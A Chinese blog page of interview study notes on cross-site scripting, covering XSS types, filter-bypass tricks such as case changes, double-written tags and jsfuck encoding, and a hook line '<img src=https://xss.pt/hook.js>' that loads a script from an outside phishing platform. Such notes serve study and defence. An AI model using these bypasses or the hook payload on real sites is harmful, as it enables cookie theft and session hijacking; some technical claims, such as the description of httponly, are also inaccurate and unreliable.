当前位置:网站首页>安全面试之XSS(跨站脚本攻击)
安全面试之XSS(跨站脚本攻击)
2022-07-06 09:23:00 【不知名白帽】
1、XSS原理:开发人员没有做好过滤,导致我们可以闭合标签进而插入并执行恶意JS代码
2、xss类型分类
DOM型:由DOM文档完成解析
反射型:即插即用,没有存储在数据库里面
存储型:被存储在数据库里面,造成持久型的攻击
3、常用的JS函数
document.cookie():弹出当前网址的浏览器cookie
console.log('xss'):在控制台输出日志
4、绕过方式
4.1.改变大小写:<SCript>
4.2.编码绕过(html实体编码、十进制十六进制八进制编码、unicode编码)、
4.3.关闭标签:利用大于号>关闭标签使得xss生效
4.4.双写饶过:<scr<script>ipt>
4.5.可以使用空格.换行,tab键或者/**/,/*!a*/,的形式绕过关键词的检测
4.6.用/代替空格
4.7.用反引号代替括号、双引号
4.8.用throw代替括号
4.9.用html实体编码:代替冒号
4.10.用jsfuck编码绕过大部分字符过滤
5、扫描工具
xsstrick
6、XSS钓鱼平台
kali工具:BEEF
免费平台:https://xss.pt/
钓鱼语句:<img src=https://xss.pt/hook.js>
7、xss防御
7.1、过滤敏感字符,例如:aler()、<script>、onerror
7.2、增加httponly:禁止前端执行JS代码
边栏推荐
- xray与burp联动 挖掘
- Tencent map circle
- 实验九 输入输出流(节选)
- 实验四 数组
- Strengthen basic learning records
- 力扣152题乘数最大子数组
- 1. Preliminary exercises of C language (1)
- 7-9 制作门牌号3.0(PTA程序设计)
- 2022 Teddy cup data mining challenge question C idea and post game summary
- Record a penetration of the cat shed from outside to inside. Library operation extraction flag
猜你喜欢
外网打点(信息收集)
Difference and understanding between detected and non detected anomalies
Strengthen basic learning records
网络层—简单的arp断网
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
The difference between cookies and sessions
UGUI—Text
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
HackMyvm靶機系列(3)-visions
. How to upload XMIND files to Jinshan document sharing online editing?
随机推荐
Hackmyvm target series (1) -webmaster
Hackmyvm Target Series (3) - vues
Applet Web Capture -fiddler
[three paradigms of database] you can understand it at a glance
Meituan dynamic thread pool practice ideas, open source
Relationship between hashcode() and equals()
Low income from doing we media? 90% of people make mistakes in these three points
Hackmyvm target series (4) -vulny
Record once, modify password logic vulnerability actual combat
3. Input and output functions (printf, scanf, getchar and putchar)
Network layer - simple ARP disconnection
力扣152题乘数最大子数组
4. Branch statements and loop statements
强化学习基础记录
canvas基础2 - arc - 画弧线
撲克牌遊戲程序——人機對抗
强化学习基础记录
内网渗透之内网信息收集(五)
浅谈漏洞发现思路
xray與burp聯動 挖掘